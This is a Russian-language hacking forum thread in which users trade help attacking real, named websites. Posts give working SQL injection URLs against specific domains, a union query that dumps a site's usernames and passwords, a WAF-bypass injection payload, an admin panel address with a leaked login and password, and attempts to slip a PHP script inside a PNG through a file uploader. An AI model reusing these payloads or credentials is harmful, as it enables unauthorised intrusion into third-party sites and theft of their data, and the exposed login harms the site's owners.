Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Pro100Nyan

    Pro100Nyan New Member

    Joined:
    15 Mar 2013
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Актуально...
     
  2. Chudak

    Chudak New Member

    Joined:
    7 Aug 2015
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Code:
    ibizavipholiday.com/ru/villas?place=1'+||+ascii(lower(substring(version(),1,1)))='53
    
    version 5.1.72-cll-lve
    Помогите. WAF фильтрует information_schema.tables. Как обойти?
     
  3. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Когда пишет.. ORA-00923: FROM keyword not found where expected - это считается SQL-Уязвимостью ?
    Code:
    http://www.pz.gov.ua/prrasp/rasptrain.php?train=2345+order+by+5+--+
     
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    https://rdot.org/forum/showthread.php?t=156
     
    _________________________
  5. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Скорее всего возвращаемый content-type - text/json, XSS там не выполнить. Я бы обратил внимание на возможные получения данных и CSRF.

    Домены, которые DNS, или домены, которые наборы сетевых компьютеров с общими политиками?

    Вы в слепую крутите? У вас вывод есть. Еще есть вывод ошибок. WAF фильтрует information_schema, в настоящее время обойти это не возможно. Брутите таблицы :)
     
    #445 randman, 11 Aug 2015
    Last edited: 11 Aug 2015
    Chudak likes this.
  6. Pro100Nyan

    Pro100Nyan New Member

    Joined:
    15 Mar 2013
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    которые dns, те что сайты)
     
  7. blackhead

    blackhead New Member

    Joined:
    11 Aug 2015
    Messages:
    28
    Likes Received:
    1
    Reputations:
    0
    Нашел вот такую уязвимость
    Code:
    http://www.oscar-k.dk/newsdetail.php?id=2+union+select+1,2,3,4,5,6,7,8,9+--

    Нашел username,password но админку так и не смог найти((
    Code:
    http://www.oscar-k.dk/newsdetail.php?id=-2+union+select+1,id,username,password,5,6,7,8,9+FROM+users+LIMIT+0,1+--

    Записать файл не получается.

    Что нибудь можно тут сделать? Помогите начинающему
     
  8. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    http://www.oscar-k.dk/content/index.php?signIn=1
     
  9. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    В админке сайта есть скрипт elFinder.
    Пытаюсь через него загрузить php файл.
    Скрипт, походу, читает заголовки mime т.к.
    Файлы типа .php и html не пропускает. Если создать простейший скрипт аля
    <?php echo "1";?> не пропустит.
    Но если изображение переименовать в test.php то с легкостью загружает.
    Как правильно переименовать внутренности, чтобы файл jpg он воспринял как php или наоборот?

    Если файл test.php переименовать в test.jpg не пропускает так же...
     
  10. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    опередил) у него ещё wildcard как то хитро настроен, по идее ещё есть
    phpmyadmin.oscar-k.dk
    content.oscar-k.dk
    ftp://ftp.oscar-k.dk
     
    _________________________
    blackhead likes this.
  11. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    Проверьте, не фильтрует ли конструкцию
    <? eval('echo 1;');
    вообщем, нужно выяснить, на какие символы ругается waf
     
  12. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    Он фильтрует не содержимое файла, без разницы что там, eval или echo.
    Он фильтрует заголовки
    код типа пропустил но выполнить не удалось
    Code:
    ‰PNG
       
    IHDR       ђwSЮ       pHYs     љњ   tIMEЯ
    ’ьdп   IDATЧcшяя? ююЬМYз    IEND®B`‚
    <?php
    echo 'hello'; ?>
    
     
  13. blackhead

    blackhead New Member

    Joined:
    11 Aug 2015
    Messages:
    28
    Likes Received:
    1
    Reputations:
    0
    Спасибо, но как вы нашли? Софт или сервис? Перепробовал много, но не нашел((

    PS
    Да, и еще если не получится раcшифровать пароль, то есть еще какие нибудь варианты?
     
    #453 blackhead, 11 Aug 2015
    Last edited: 11 Aug 2015
  14. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    софт со своим словарём.
     
    blackhead and makag like this.
  15. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    http://content.oscar-k.dk/index.php?signIn=1
    seba:12345
     
    _________________________
    blackhead likes this.
  16. Chudak

    Chudak New Member

    Joined:
    7 Aug 2015
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Спасибо!!!!Вывод ошибок через extractvalue я видел, а на прямой вывод что-то не получается составить запрос. Может подскажешь?!!!
     
  17. blackhead

    blackhead New Member

    Joined:
    11 Aug 2015
    Messages:
    28
    Likes Received:
    1
    Reputations:
    0
    Спасибо, но хотелось бы знать что откуда. Если не трудно хотя-бы вкратце - как найти админку и откуда seba:12345 (в базе я нашел только юзера oscar).
     
  18. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
  19. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Code:
    place=1')sub2 WHERE 1.0Union/*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20--+
    
    Инъекция в table_references.
     
    kingbeef, Br@!ns and Chudak like this.
  20. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    ребят вот нашёл сайт, и перейдя по правельной ссылки мне выдаёт файл config и там настройки подключения к бд
    DATABASE HOSTNAME - есть
    DATABASE USERNAME - есть
    DATABASE PASSWORD - есть
    DATABASE NAME - есть
    DATABASE PORT - есть
    И ещё асякие конфигурации там вроде даже есть привязка по IP адресам
    Так вот в чём вопрос это считается серьёзной уязвимостью ? (если да то на сколько она серьёзная)